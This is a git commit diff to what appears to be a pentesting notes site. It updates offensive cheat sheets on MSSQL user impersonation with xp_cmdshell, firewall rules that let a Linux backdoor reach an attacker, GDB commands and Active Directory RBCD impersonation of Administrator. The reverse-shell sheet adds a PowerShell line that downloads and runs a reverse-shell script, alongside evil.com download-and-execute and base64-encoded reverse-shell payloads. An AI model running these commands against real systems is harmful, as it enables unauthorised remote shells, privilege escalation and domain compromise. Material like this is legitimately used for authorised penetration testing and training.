updated some exploits

hideckies · Sep 10, 2024 · 4515abd · 4515abd
1 parent 07e26de
commit 4515abd
Show file tree

Hide file tree

Showing 6 changed files with 65 additions and 37 deletions.
diff --git a/src/exploit/database/mssql-pentesting.md b/src/exploit/database/mssql-pentesting.md
@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
     - https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
-date: 2024-04-01
+date: 2024-09-10
 draft: false
 ---
 
@@ -119,6 +119,16 @@ sqsh -S <target-ip> -U username -P password -D database
 > xp_dirtree 'C:\Users\'
 ```
 
+### Impersonate Other Users
+
+Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#impersonation-of-other-users)
+
+```bash
+# Assume that the 'sa' user can be impersonated.
+EXECUTE AS 'sa'
+EXEC xp_cmdshell 'whoami'
+```
+
 <br />
 
 ## Spawn a Windows Command Shell and Run Commands using Impacket

diff --git a/src/exploit/linux/post-exploitation/linux-backdoors.md b/src/exploit/linux/post-exploitation/linux-backdoors.md
@@ -4,7 +4,7 @@ description: After compromising a target machine, the adversary attempts to esta
 tags:
     - Privilege Escalation
 refs:
-date: 2024-08-20
+date: 2024-09-10
 draft: false
 ---
 
@@ -280,14 +280,19 @@ nc -lvnp 4444
 
 ## Option: Firewall Bypass
 
-If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege.
+If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege.  
 
 ```bash
+# List the iptables settings
+iptables --list
+
 # ACCEPT: TARGET => ATTACKER
+# OUTPUT 1: The first rule of the OUTPUT chain.
 # -d: Destination address
 iptables -I OUTPUT 1 -p tcp -d <attacker-ip> -j ACCEPT
 
 # ACCEPT: TARGET <= ATTACKER
+# INPUT 1: The first rule of the INPUT chain.
 # -s: Source address
 iptables -I INPUT 1 -p tcp -s <attacker-ip> -j ACCEPT
 ```
diff --git a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md
@@ -4,7 +4,7 @@ description: GDB (GNU Debugger) is a portable debugger used for reverse engineer
 tags:
     - Reverse Engineering
 refs:
-date: 2024-08-28
+date: 2024-09-10
 draft: false
 ---
 
@@ -25,6 +25,37 @@ gdb ./example
 
 ## Commands in GDB
 
+### Analysis
+
+```sh
+# List functions.
+info functions
+```
+
+### Breakpoints
+
+```bash
+# Set a breakpoint at a specified line number, function, or address.
+break main
+b main
+break *0x12345678
+# Add a breakpoint to the relative address position from the main function.
+b *main+25
+
+# Information about breakpoints
+info breakpoints
+i breakpoints
+i b
+
+# Delete all breakpoints
+delete breakpoints
+d breakpoints
+# Delete the specified breakpoint
+delete <breakpoint_number>
+delete 1
+d 1
+```
+
 ### Debug
 
 ```bash
@@ -59,30 +90,6 @@ set disassembly-flavor intel
 disass main
 ```
 
-### Breakpoints
-
-```bash
-# Set a breakpoint at a specified line number, function, or address.
-break main
-b main
-break *0x12345678
-# Add a breakpoint to the relative address position from the main function.
-b *main+25
-
-# Information about breakpoints
-info breakpoints
-i breakpoints
-i b
-
-# Delete all breakpoints
-delete breakpoints
-d breakpoints
-# Delete the specified breakpoint
-delete <breakpoint_number>
-delete 1
-d 1
-```
-
 ### Values
 
 ```sh

diff --git a/src/exploit/shell/reverse-shell-cheat-sheet.md b/src/exploit/shell/reverse-shell-cheat-sheet.md
@@ -8,7 +8,7 @@ tags:
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
     - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-date: 2024-04-01
+date: 2024-09-10
 draft: false
 ---
 
@@ -133,6 +133,8 @@ powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234
 
 powershell Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/revshell.ps1')
 
+powershell -c "Invoke-Expression (Invoke-WebRequest -usebasicparsing http://10.0.0.1:8000/revshell.ps1)"
+
 # Base64 encoded payload
 powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgnMTAuMC4wLjEnLDEyMzQpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk=
 

diff --git a/...xploit/windows/active-directory/resource-based-constrained-delegation-attack.md b/...xploit/windows/active-directory/resource-based-constrained-delegation-attack.md
@@ -1,13 +1,13 @@
 ---
-title: Resource-Based Constrained Delegation Attack
+title: RBCD (Resource-Based Constrained Delegation) Attack
 description: Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.
 tags:
     - Active Directory
     - Kerberos
     - Windows
 refs:
     - https://github.com/tothi/rbcd-attack
-date: 2023-02-18
+date: 2024-09-10
 draft: false
 ---
 
@@ -27,25 +27,25 @@ To achieve this attack successfully, we need the following conditions:
 ### 1. Create Fake Computer
 
 ```bash
-impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password
+impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'
 ```
 
 ### 2. Modify Delegation Rights
 
 We can use [rbcd.py](https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation) for abusing `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target.
 
 ```bash
-rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password
-
-rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass
+impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
 ```
 
 ### 3. Get the Impersonated Service Ticket
 
 Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.
 
 ```bash
-getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password
+impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
+# or
+impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
 ```
 
 ### 4. Use the Service Ticket
@@ -68,3 +68,7 @@ klist
     # -no-pass: No password
     impacket-wmiexec example.local/[email protected] -k -no-pass
     ```
+
+- Dump credentials
+
+    See [Dumping Windows Password Hashes](/exploit/windows/privilege-escalation/dumping-windows-password-hashes/)
diff --git a/src/exploit/windows/active-directory/smb-pentesting.md b/src/exploit/windows/active-directory/smb-pentesting.md
@@ -5,7 +5,7 @@ tags:
     - Active Directory
     - Windows
 refs:
-date: 2024-08-11
+date: 2024-09-10
 draft: false
 ---